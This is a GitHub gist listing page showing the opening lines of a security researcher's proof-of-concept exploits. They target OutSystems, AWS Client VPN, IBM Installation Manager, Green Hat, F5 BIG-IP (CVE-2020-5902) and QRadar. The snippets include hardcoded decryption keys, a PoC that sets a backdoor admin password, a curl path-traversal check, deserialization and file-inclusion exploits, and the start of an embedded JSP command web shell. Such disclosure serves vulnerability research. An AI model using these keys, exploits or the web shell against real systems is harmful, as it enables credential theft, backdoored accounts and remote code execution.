Skip to content

Instantly share code, notes, and snippets.

@ykoster
ykoster / OutCrack.sh
Last active October 25, 2022 12:39
Quick 'n Dirty PoC for cracking OutSystems hashes with hashcat
#!/bin/bash
# Crack hashes generated by OutSystems (PoC)
# batman
hash='$1$ms7rBI3MKLalgjmCFwavo5ROC/Cw5C6QXUxwgbUrAHw=131FFFE778BF3BD89911BBA49184A14DAA625B2FA2FA8D2C086BF35FF62539B046768E1885F43A7120199867B7AFAED9A53FD1A7C165CC12C8AE24370A792754'
#hash='2A37D95E1EF22207DC6B09B55899B461'
# hunter2
#hash='$1$BYi7cMS7AXlNwKz/ozjUu9lhO83DjhNEDz5qPom78lU=2D2DC5245359DCC7F87E1D39E707E7AA1A4476D2346D5441104F29E412BADC64FAF2C6B182AD09B00AB26D5DC794456F7D75288F41E73AB440B2D8A52E3012CA'
#hash='A8629A13DC6381CC9F2166C3A36232E3'
@ykoster
ykoster / Invoke-ExploitAWSVPNLPE.psd1
Last active June 15, 2022 12:14
AWS Client VPN < 3.1.0 OpenVPN config validation flaw can be used to escalate privileges (proof of concept)
<#
Usage:
Import-Module .\Invoke-ExploitAWSVPNLPE.psd1
Invoke-ExploitAWSVPNLPE
#>
@{
RootModule = 'Invoke-ExploitAWSVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '656e7aa1-797d-42c9-ac70-4d50378f5457'
Author = 'Yorick Koster'
@ykoster
ykoster / cicdecrypt.py
Created December 24, 2020 04:44
IBM Installation Manager imcl / imutilsc encryptString command decrypt script
#!/usr/bin/env python3
import re
import sys
import base64
from Crypto.Cipher import AES
val = '^(?:[A-Z0-9+/]{4})*(?:[A-Z0-9+/]{2}==|[A-Z0-9+/]{3}=)?$'
key = base64.b64decode(b'BTQOll+YFPIcsB+vMfXNTg==')
def decrypt(e):
@ykoster
ykoster / ghcdecrypt.py
Created December 23, 2020 10:33
IBM Green Hat / Rational Integration Tester password decryptor
#!/usr/bin/env python3
import re
import sys
import array
val = '^#com.ghc.1![0-9A-F]+$'
key = array.array('H', [0x12FD, 0x4AAD, 0x4405, 0xE327, 0xA28A, 0x7211, 0x1111, 0x5543, 0x0CDD, 0x6A31, 0x4080, 0x217E, 0x7E73])
def decrypt(e):
p = re.compile(val, re.IGNORECASE)
@ykoster
ykoster / cve-2020-5902-tmsh.py
Created July 5, 2020 13:25
Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
#!/usr/bin/env python3
import os
import requests
import urllib.parse
target='<ip of target>'
base_url=f'https://{target}/'
password='B@ckd00r!'
def check(base_url):
@ykoster
ykoster / cve-2020-5902-check.sh
Last active July 8, 2020 10:02
Bash one-liner to check if a device is vulnerable for CVE-2020-5902
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \
grep -q Vulnerable && \
printf '\033[0;31mVulnerable\n' || \
printf '\033[0;32mNot Vulnerable\n'
@ykoster
ykoster / qradar_deserialize.py
Created April 16, 2020 08:12
Proof of concept for Java deserialization vulnerability in QRadar RemoteJavaScript Servlet
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
base_url='https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / qradar_session_deserialize.py
Created April 16, 2020 08:11
Proof of concept for QRadar session manager path traversal vulnerability
#!/usr/bin/env python3
import json
import base64
import random
import urllib3
import requests
import urllib.parse
base_url=f'https://127.0.0.1/'
username='admin'
@ykoster
ykoster / qradar_php_lfi.py
Created April 16, 2020 07:55
Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept
#!/usr/bin/env python3
import json
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict
base_url=f'https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / pop_chain.php
Created April 16, 2020 07:51
PHP object injection vulnerability in QRadar Forensics web application (CVE-2020-4271) proof of concept
<?php
include("/opt/ibm/forensics/html/includes/license.inc.php");
include("/opt/ibm/forensics/html/includes/simple_html_dom.php");
$jsp = <<<__EOF
<!DOCTYPE html>
<html>
<pre>
<%@page import="java.util.*,java.io.*"%>
<% if (request.getParameter("c") != null) {